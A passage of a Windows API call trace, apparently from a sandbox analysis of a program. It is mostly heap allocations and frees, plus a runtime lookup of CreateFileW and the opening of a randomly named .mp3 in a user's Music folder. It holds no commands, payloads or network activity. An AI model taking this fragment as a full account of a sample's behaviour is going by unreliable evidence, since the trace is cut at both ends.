RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0118.094] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0118.094] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0118.094] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0118.094] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0118.094] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0118.094] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff40 [0118.094] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0118.094] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0118.094] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0118.094] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0118.094] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0118.094] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0118.094] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0118.094] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0118.094] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0118.094] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0118.094] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0118.094] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0118.094] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0118.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0118.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0118.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0118.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0118.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0118.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0118.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0118.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0118.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0118.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0118.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0118.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0118.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0118.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0118.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0118.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0118.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0118.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0118.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0118.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0118.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0118.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0118.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0118.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0118.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0118.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0118.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0118.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0118.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0118.095] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0118.095] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0118.096] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0118.096] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0118.096] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0118.096] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0118.096] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0118.096] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0118.096] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0118.096] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0118.096] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0118.096] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0118.096] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0118.096] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0118.096] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0118.096] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0118.096] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0118.096] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0118.096] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0118.096] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0118.096] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0118.096] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0118.096] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0118.096] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0118.096] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0118.096] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0118.096] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0118.096] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0118.096] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0118.096] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0118.096] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0118.096] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0118.096] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0118.097] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0118.097] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0118.097] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0118.097] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0118.097] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0118.097] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0118.097] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0118.097] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0118.097] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0118.097] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0118.097] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0118.097] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0118.097] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0118.097] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0118.097] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0118.097] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0118.097] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0118.097] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0118.097] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0118.097] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0118.097] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0118.097] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0118.097] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0118.097] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0118.097] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0118.097] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0118.097] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0118.098] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0118.098] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0118.098] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0118.098] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0118.098] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0118.098] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0118.098] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0118.098] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0118.098] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0118.098] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0118.098] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0118.098] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0118.098] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0118.098] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0118.098] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0118.098] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0118.098] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0118.098] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0118.098] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0118.098] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0118.098] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0118.098] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0118.098] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0118.098] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0118.098] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0118.098] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0118.098] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0118.098] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0118.099] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0118.099] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0118.099] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0118.099] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0118.099] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0118.099] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0118.099] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0118.099] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0118.099] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0118.099] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0118.099] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0118.099] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0118.099] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0118.099] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0118.099] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0118.099] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0118.099] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0118.099] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0118.099] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0118.099] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0118.099] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0118.099] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0118.099] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0118.100] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0118.100] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0118.100] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0118.100] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca748 [0118.100] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca748, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0118.100] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0118.100] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0118.100] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0118.100] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0118.100] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0118.100] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0118.100] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0118.100] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0118.100] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0118.100] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0118.100] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0118.100] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0118.100] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x4506008 [0118.100] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0118.100] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0118.100] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0118.100] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0118.100] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0118.101] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0118.101] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0118.101] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0118.101] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\tG2O\\vgfSxUhhzUZpNrrLJ3hR.mp3" (normalized: "c:\\users\\fd1hvy\\music\\tg2o\\vgfsxuhhzuzpnrrlj3hr.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298 [0118.101] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0118.101] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e8cd8 [0118.101] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0118.101] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0118.101] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0118.101] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0118.101] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0118.101] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0118.101] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0118.101] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0118.101] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0118.101] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0118.101] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0118.101] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0118.101] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0118.101] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431e220 [0118.101] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4506008 | out: hHeap=0x1780000) returned 1 [0118.101] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0118.101] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0118.101] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0118.101] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0118.102] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0118.102] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0118.102] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0118.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0118.102] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0118.102] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0118.102] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0118.102] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0118.102] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0118.102] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0118.102] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0118.102] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0118.102] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0118.102] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0118.102] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0118.102] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0118.102] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0118.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0118.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0118.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0118.103] FreeLibrary (hLibModule=0x772d0000) returned 1 [0118.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0118.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0118.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0118.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0118.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0118.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0118.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0118.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0118.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0118.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0118.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0118.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0118.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0118.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0118.103] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 